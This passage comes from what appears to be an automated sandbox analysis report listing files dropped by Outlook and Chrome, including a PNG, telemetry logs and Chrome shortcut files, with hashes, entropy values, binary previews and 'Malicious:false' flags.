                                                                                                                        SHA1:C51ADB67EA4A656D6123D1B75D79E57D8F8D5F7F
                                                                                                                        SHA-256:5B55947B12820742FB84B87E06312278D48F0C7B7CE9592E5A1297A9AF4E573A
                                                                                                                        SHA-512:7EF93058D3278955F49DE421F27E05B82049D4C4D47A858FBC8155C9751E60EF0B1A80C9CE9EAE7D4E30182F5D08943F6B5D5E550A41B8F4337E53D1E5D138FC
                                                                                                                        Malicious:false
                                                                                                                        Preview:7....-...........t..0....w.E..).........t..0....Rd..:{SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:PNG image data, 1735 x 1824, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):608073
                                                                                                                        Entropy (8bit):7.957339213231587
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:JhDBl1VFBmHY75Hfrpc3wAGCkH0p7qXFsfFdloKz1kZIJbCB:JhVp7mH+HfFwJc0p7XFdnlRc
                                                                                                                        MD5:5A786E418DCE2514812AC632B7DBBEB0
                                                                                                                        SHA1:8514E07CFCDCBC569BFD52DC43DC706785FCCDF0
                                                                                                                        SHA-256:FF6167457C7CD79C7B917FCE733C3005C2C7107094F2D1ADD7C90B2E9A199027
                                                                                                                        SHA-512:B98CC72148D30B04143438FFAF521CABFB49545695416F93306552A6548CE61C8263AF8A5999CDFB51BB623BD911615AA8446FADC4AC368BC3D2AC630012AB17
                                                                                                                        Malicious:false
                                                                                                                        Preview:.PNG........IHDR....... ......V.1....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....-.y..~.}.... ....7.)R.....e..5..=.{8F3G{........nI.^i{Z.$.4.'E':. h@. .{........E.**..U.U.....x......_..7....#G.,..B.!..B.!..B.!..C@...B.!..B.!..B.!..b.#qL.!..B.!..B.!..B.....B.!..B.!..B.!.. qL.!..B.!..B.!..B.....B.!..B.!..B.!.. qL.!..B.!..B.!..B.....B.!..B.!..B.!.. qL.!..B.!..B.!..B.....B.!..B.!..B.!.. qL.!..B.!..B.!..B.....B.!..B.!..B.!.. qL.!..B.!..B.!..B.....B.!..B.!..B.!.. qL.!..B.!..B.!..B.....B.!..B.!..B.!..P;r..bo].)...!.K.V.Y.^.K.u..<`...;.....rk..~Y..|Z..n....f...0..4._...........2...H..k.W.N.......~..b....)....j)....f".....dG........N.....:)[Q.j.S...z...1./....W.:...Q..S.1.2......z._-e}.../...cC.'.?...OH.>..g...U...S....F..._l.....[m?%m._..|.z....Zh...2....V.2.UmC..P....B.....)..~..U.j...>~[5N..~...wU.)i.../......wJ.~?.NZnP...m.j....O.........?..f...j...>.mT....7..aX.. ...C....1q.~.`.n......_Sp.!../+.....2k9...~J.V?6....n..A~..>....{y_.+;.
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2040
                                                                                                                        Entropy (8bit):1.210120150110926
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:vw2ILqi8vZQcmSaZSa6rwbcGDyl/aMhN6Jczby+l1u3JoD+:vw9Lqi8vZDmHZMwbcGD2SQ7bzlqoD
                                                                                                                        MD5:DC002C8107159BA15E3A1954D26021CC
                                                                                                                        SHA1:2B9D127FA97BECD81B144D34E129C8746855AD61
                                                                                                                        SHA-256:6F48E5DDD3AFE78C3B63DB7CE1DAEC2E323E58B81A11A8E941ADAC37F78F548D
                                                                                                                        SHA-512:997B94E150E8A502F17C813BDBC048D661DDAE70112261C867972B8591A37C7BEAA532959C9A75E7010596F3A4518056249469D762CBD758BC281B06A4E67F74
                                                                                                                        Malicious:false
                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:ASCII text, with very long lines (28746), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20971520
                                                                                                                        Entropy (8bit):0.16216897739777902
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:PS6u2GsoI8TviIyT2FtuyiI18KJjWmojfM2Y6Z1NS7JKfB/HkK+M:plo1eIyqyPm+
                                                                                                                        MD5:8918839459A1620A37D392710C56068D
                                                                                                                        SHA1:0CA12C3937E8637AA73946DF0F8B0ECDF80EC8B4
                                                                                                                        SHA-256:B6C5A9E74A29CB2FB611FFD6F743CDAD22946E26829974884B039F0E248B5225
                                                                                                                        SHA-512:3313472DC66BB44419F2438060AA2072FCA5903898B9D852707022A83C96FDD3523A8365CED05C60E4B52009DC5B1EC33C75C0F26EF98E6E92820E7BE6FABDFA
                                                                                                                        Malicious:false
                                                                                                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..02/02/2024 19:17:23.499.OUTLOOK (0x113C).0x15F0.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-02-02T19:17:23.499Z","Contract":"Office.System.Activity","Activity.CV":"cM6eM5H3c0y6EKy1QmH7zQ.4.11","Activity.Duration":73,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...02/02/2024 19:17:23.563.OUTLOOK (0x113C).0x15F0.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-02-02T19:17:23.563Z","Contract":"Office.System.Activity","Activity.CV":"cM6eM5H3c0y6EKy1QmH7zQ.4.12","Activity.Duration":55769,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajor
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20971520
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3::
                                                                                                                        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                        Malicious:false
                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):110592
                                                                                                                        Entropy (8bit):4.508705523915089
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:gGfx+58/cQBwCvA/Xo45l2D9OVQboP+zXWDsydm9ZfkD27WPZWQWaWPN8+mTaxmb:VUY45l2D9OVUoAXYs/XfkD2OZ
                                                                                                                        MD5:7A1D96D4B8941BCCA9EBAB3B765A6BE7
                                                                                                                        SHA1:18FBD73F6D4C6DBD8CA1CCF28AAFC0110D9A03D7
                                                                                                                        SHA-256:76323E15055EF440E6E35A48A59984310D8C91893F85DE6C71749EACE09EB878
                                                                                                                        SHA-512:EDBFCFCB175002C1A817C6831E9EED5A2A514DFDA1F2956E4A1300AEA2CE1ED18C2592CD5F26F64C531CD207FABE9431EC3E33CCCB4814AE8F666A8280DE3054
                                                                                                                        Malicious:false
                                                                                                                        Preview:............................................................................`.......<....D.s.V..................eJ..............Zb..2.......................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1............................................................s..)............D.s.V..........v.2._.O.U.T.L.O.O.K.:.1.1.3.c.:.5.4.3.e.6.d.b.e.8.6.e.2.4.c.8.9.b.3.f.d.8.9.b.5.6.6.0.a.0.a.1.b...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.2.0.2.T.2.0.1.7.2.3.0.0.8.9.-.4.4.1.2...e.t.l.......P.P.....<....D.s.V..........................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):477001
                                                                                                                        Entropy (8bit):7.946199356127298
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:eY75Hfrpc3wAGCkH0p7qXFsfFdloKz1kZIJbCB:e+HfFwJc0p7XFdnlRc
                                                                                                                        MD5:5EA6D6F6EFFBEA0504F5CA5F3FD466BE
                                                                                                                        SHA1:E78EA5F9063A951DB8CF3084AFFF4718F5FC8196
                                                                                                                        SHA-256:64523C610027C04188664F8B392A20209414033AB073835CF95D2E4DD96F6ECE
                                                                                                                        SHA-512:524B5A1D1519F3548A5673B366309FD55A6C79A85B4C2479BBA70A32A5960E1E8124C4AA4B11A32DE932DFB4C6781C4CD3369D42D8A60E6E8CD40B10F982F4C8
                                                                                                                        Malicious:false
                                                                                                                        Preview:&..0....IDAT'F..h,o.(Y(....[%...........m.."w..6..k..U.|\&...|._..7]+.z...4.y..e../...~S.F..=w.S>.;...n.R./_.K./.u...|....k...Y.8U%....@....Z.e=.V..\......z.|.......T.Z!.......S.-..kW..._...\....N1...8...8..q...w..~..(.W!.kti.%.{e...y.*....u......B...RY.P...s*h~.....k.....M........7^#.Vq.a....<....K.U|.`.Y;\Z.3}.......Z..x..|.R..;w.c...&.0\.n...e......7.....n.2....m.\{.V.i#....{......(..p)3...~........O.W^.k.V.V.~]t.z....U...h.YQ+.....K/o.g..".]=.F&..(_H..kZ.....oy/8...g....w.!w..N...P.....}*.u..S.Y.b...z....d..2>6..fY.....e..V..E..!.Vp6-.+.......\qFh2....r...}..;n.U...e:..x..>....P......v.^..G......3.Yo...o.P....o....vY.r.|......\#.k.....j......6.K4rf.g.p..g.p.".............\r.zY.d.....t..`..T._.8^.u...o.n./,..y........un..H.....U.d..}e..+W,...s...]....G>U...!C.......H.{.;.;..W.PM1...z.|.C...(......>..#.......U.....-......../...X.....ukW..WlF..r..N..'.^.q.../.M9%.P^o....g..G.Ke....Zf7n..r..;.U....v..4::).v...xH:...o..J.....
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):538743
                                                                                                                        Entropy (8bit):5.985040369613699
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:o1yRTcdqoY0+9wMAOpD19d22CKmeHnEHUAOfMimz9nuWoJG:oEcIoY0+uApD19d2RPeHFfMimMWkG
                                                                                                                        MD5:1E61E715256EBAF1FC402E20D125D716
                                                                                                                        SHA1:570261A091FBFFAB1792A58A9EB83343B652B03F
                                                                                                                        SHA-256:B833FE84A776762B57CD6B9669D7F4E8F223CFEEAAC964E47083CBBFFEEB882E
                                                                                                                        SHA-512:4D35C8CD2EE73760253A53FEE992AD06ED57870FD0CCD43E613CD4AE4FEAFE440951BFC50051F7562A653693C77371FCABB41EDA6EBCD186A8FB36C81C0F8927
                                                                                                                        Malicious:false
                                                                                                                        Preview:RNWPREP...A..<.l........48.......$\.c.S.E.K..eH8.'^........HE..@...P.Q.....uY|.8.......$S.,..`......L`.....$S...`VY.....L`.....M.Rb.................c.@........... ...D..Qb..P'....Ne..`......Qb........ul..`.....D..Qb..^.....n_..`D....D..Qb........Yu..`.....D..Qb*.......Gr..`......Qb*.w0....kh..`2....D..Qb........qA..`......QbF.......Ci..`\....D..QbN.+o....Jd..`.....D..QbZ.......Yn..`X.....QbZ.......ZI..`"....D..Qbn..v....td..`......Qbr.......cl..`......Qbr..i....Il..`d....D..Qb~.......cs..`......Qb~.sv....xc..`.....D..Qb..',....iu..`.....D..Qb........bC..`.....D..Qb........Da..`p.....Qb........MC..`......Qb..1.....b_..`^.....Qb..U.....$u..`......Qb........ff..`.....D..Qb.......Ha..`h....D..Qb.......Hm..`......Qb.+.....qv..`.....D..Qb.@.1...._d..`&....D..Qb.@-[....zt..`.....D..Qb.@.L....Pc..`,.....Qb........cg..`j....D..Qb.A.2...._A..`......Qb..Wi....I_..`P....D..Qb&.......Fg..`......Qb*.c.....qy..`.....D..Qb>A......ov..`......Qb>.......B_..`.....D..QbJAw6....bv..``....D..QbZ.mJ...
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):30
                                                                                                                        Entropy (8bit):1.2389205950315936
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:RCh/t:
                                                                                                                        MD5:E6638629F9DF02D27BBD2FFEE0CDED35
                                                                                                                        SHA1:C39010D28778F2F4CEB5088F59E13B07922C5E04
                                                                                                                        SHA-256:28A5F0BF9D71D8D4732894D92831D15B78779C19A2CCBD1563DCF36AE8258A66
                                                                                                                        SHA-512:E895D06D09C4DE1B8D746DE4F081ACDC82D690D17ECF7C6B8C817580774647D65EB93C7E8660BE44F9479300BA681D8B82128F1BA88A0FBB6F9D6BE122D05448
                                                                                                                        Malicious:false
                                                                                                                        Preview:..............................
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):16384
                                                                                                                        Entropy (8bit):0.6695892847128961
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:rl3baF0StsqLKeTy2MyheC8T23BMyhe+S7wzQP9zNMyhe+S7xMyheC0Gx:rJSRmnq1Py9610i
                                                                                                                        MD5:AF2B405EC063DCD023B99C716D87D0AE
                                                                                                                        SHA1:131BEC0601B93450AF419D707742C3887A22BFA2
                                                                                                                        SHA-256:0B376C0D0A4D3AD6FBB069AB0BBEF67B14956A7AEDE6E120522BAF3B4F85B51A
                                                                                                                        SHA-512:8308566BABAE390AAA410A5BE8FEB48FD05744F8A49360693CA5F416294DEA39BC7840458EE916752B18FA1F73E4D446A1EFF0FA63A5EA29394BFD8D061A8DAD
                                                                                                                        Malicious:false
                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 2 18:17:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2673
                                                                                                                        Entropy (8bit):3.983352166094504
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:8wdaljT6la2fHleidAKZdA1FehwiZUklqehLy+3:8Fj10y
                                                                                                                        MD5:1894913133EA1EDCA4C4B6877A222334
                                                                                                                        SHA1:6F08074A811578A33972216E19A75229171A972A
                                                                                                                        SHA-256:7D4834A07D68DEF5787B358259185DE66198417B2B282F958BB8B8C3996CCBF5
                                                                                                                        SHA-512:2B6894F03AF8ACEE00CBDC9316833F85DC6C69A4D44326846719EF49EA41618DE40B4D6911D5A93DF08235407F7A6A26278AE49971A6CE2EE50070512DF8D736
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F.@.. ...$+.,....4M.~.V..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IBX&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBX3.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VBX3.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VBX3............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VBX5............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............p}......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 2 18:17:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2675
                                                                                                                        Entropy (8bit):4.00163409712917
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:83daljT6la2fHleidAKZdA1seh/iZUkAQkqehky+2:8Ujr9QVy
                                                                                                                        MD5:FB6A8BEC253C74FF8D7E298CF550E82A
                                                                                                                        SHA1:65953A95C57F16341DEC680E9900CBBAAE538751
                                                                                                                        SHA-256:0E129D6E8295B63EC0E859AFE927CE1277875379E74B4ACF5BBA379F3488AC67
                                                                                                                        SHA-512:61DDE7D76CAF758CF1ADE655F2A30436A18F777D8C901D4D1B7380BF1F751D7D450241F05D277172D602CEEF45183A97CFE4EC4E5A82D1AA391CF695E915C8BC
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F.@.. ...$+.,.......}.V..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IBX&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBX3.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VBX3.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VBX3............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VBX5............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............p}......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2689
                                                                                                                        Entropy (8bit):4.009282646189117
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:82daljT6laAHleidAKZdA14meh7sFiZUkmgqeh7s+y+BX:83jdnoy
                                                                                                                        MD5:F2F2B838EEE2172044BAEB52E0FB9150
                                                                                                                        SHA1:91DF2D638813521B7746719D373C2A2EB8C3B7E5
                                                                                                                        SHA-256:C526B72995F2A18DADBD27A9FDE6EC66185323197E4F28292E4BAD35C07C5319
                                                                                                                        SHA-512:CEC672BBADD118DE879D430175D6B22081755B3E4391F2AE0DB57A6F9B15A9544B11EB04A769C9DBAA0B2994FB316FC2DB648D1ABC2333F7B7D1AFF8B8211B7C
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IBX&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBX3.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VBX3.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VBX3............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............p}......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 2 18:17:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2677
                                                                                                                        Entropy (8bit):3.999004689549098
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:8jdaljT6la2fHleidAKZdA1TehDiZUkwqehAy+R:8gj42y
                                                                                                                        MD5:06FB12BED308B0688B7085FBE586B5EA
                                                                                                                        SHA1:148A66CF087D2BC05E5EFE06D8612A833264C1CC
                                                                                                                        SHA-256:5B864806A2A201E96E4E38FF3763F1C132A98023973FF34584AF41C18F068604
                                                                                                                        SHA-512:EFECD6423A133A2CDC9BF1D328B837E76BF2428F9858146B1B67792C85FD2B3054C04DDE01D29E53968225436011CF8337E0770B9580F0F4467877FE3C792105
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F.@.. ...$+.,.....".}.V..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IBX&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBX3.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VBX3.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VBX3............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VBX5............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............p}......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 2 18:17:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2677
                                                                                                                        Entropy (8bit):3.9854545931161307
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:8AdaljT6la2fHleidAKZdA1dehBiZUk1W1qehyy+C:81jI9Sy
                                                                                                                        MD5:4228B2F0CF27A63B88F8F6490A2766E4
                                                                                                                        SHA1:2DE58777B1226ADA460FE6D327B8E77D3C7711C8
                                                                                                                        SHA-256:7E17C1386C9CD40F8B9F50472EA7AE672511550C8C496A933C83F0F50FB5416A
                                                                                                                        SHA-512:266965A37994840CFBE623C843C15889E60A77E12B99754576C1CAE75DE60C29B77E21C33FBCD5EA83383FE18B9B483861153D8C0EBEB21D80AE99D601463D1D
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F.@.. ...$+.,.......~.V..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IBX&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBX3.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VBX3.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VBX3............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VBX5............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............p}......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 2 18:17:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2679
                                                                                                                        Entropy (8bit):3.999177306574188
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:8TdaljT6la2fHleidAKZdA1duTeehOuTbbiZUk5OjqehOuTboy+yT+:8wj6TfTbxWOvTboy7T
                                                                                                                        MD5:D8A22C6B34AC19AF149F48D583DA1DD5
                                                                                                                        SHA1:EFB73DAABEFB0E8CBCF5C56F5DD60000BE10E9FF
                                                                                                                        SHA-256:34F4BE6824A6BD772B8E580601C2A28B5BB26CDE28B8E2B3CCD6BB7ACA4C178E
                                                                                                                        SHA-512:2ABB94505A6B68B131B9C06E3531D1DF72070913D5650C01C2C9A73CE998A2B139CA8C2B2B08B6A3F13E809AAF279DDA7ABDD182AE9CA345C2DBB0EEEDFB4B1E
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F.@.. ...$+.,.....|.}.V..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IBX&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBX3.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VBX3.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VBX3............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VBX5............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............p}......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
